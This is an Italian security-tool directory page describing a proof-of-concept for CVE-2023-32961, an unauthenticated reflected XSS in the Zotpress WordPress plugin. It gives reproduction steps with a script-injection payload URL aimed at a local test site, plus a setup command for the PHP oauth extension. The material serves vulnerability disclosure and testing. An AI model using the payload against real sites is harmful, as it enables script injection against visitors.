Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-32961 — PoC di CVE-2023-32961 | Kitploit
Strumenti/GitHubGitHub/lourc0d3/cve-2023-32961
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHublourc0d3/cve-2023-32961

CVE-2023-32961

PoC di CVE-2023-32961

Vedi Repository
2113 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-32961

Questa repository riguarda la vulnerabilità XSS nel plugin Wordpress Zotpress.

Dettagli del componente


Nome del componente

Zotpress

Versione vulnerabile

≤ 7.3.3

Slug del componente

zotpress

Link del componente

https://wordpress.org/plugins/zotpress/

Prerequisito


Non autenticato

Dettagli della vulnerabilità


Breve descrizione

La funzione get_request_token in zotpress/lib/admin/admin.accounts.oauth.php è vulnerabile a un attacco XSS.

Scarica lo strumento

Come riprodurre (PoC)

  1. Installa l'estensione PHP oauth per attivare la vulnerabilità. (Questa è opzionale per Zotpress)
  2. Accedi a zotero.org
  3. Devono essere soddisfatte le condizioni per l'esecuzione della funzione get_request_token. (solo la prima volta) Invia un payload come questo: http://localhost:8080/wp-content/plugins/zotpress/lib/admin/admin.accounts.oauth.php?return_uri=http://localhost:8080&oauth_token=1
  4. Invia il payload qui sotto http://localhost:8080/wp-content/plugins/zotpress/lib/admin/admin.accounts.oauth.php?return_uri=http://localhost:8080&oauth_token="><script>alert(1)</script>

Informazioni aggiuntive

  • Hai bisogno di un account zotero.org.

  • Devi impostare il valore di oauthState a 1 per attivarla. Se il payload precedente non funziona, devi trovare un modo per impostare oauthState a 1.

    • espressione condizionale :

      root@kitploit:~
      $_GET['oauth_token'] != $state['request_token_info']['oauth_token']
      
  • Estensione PHP oauth facile da installare:

    • Comando in una riga :

      root@kitploit:~
      sudo su; apt-get update; apt-get -y install gcc make autoconf libc-dev pkg-config libpcre3-dev; pecl install oauth; bash -c "echo extension=oauth.so > $PHP_INI_DIR/conf.d/oauth.ini"; service apache2 restart
      
  • Testato nell'immagine Docker wordpress:latest.

Video PoC

https://www.youtube.com/watch?v=5kZ7bNbs_-Q

Riferimenti


CVE-2023-32961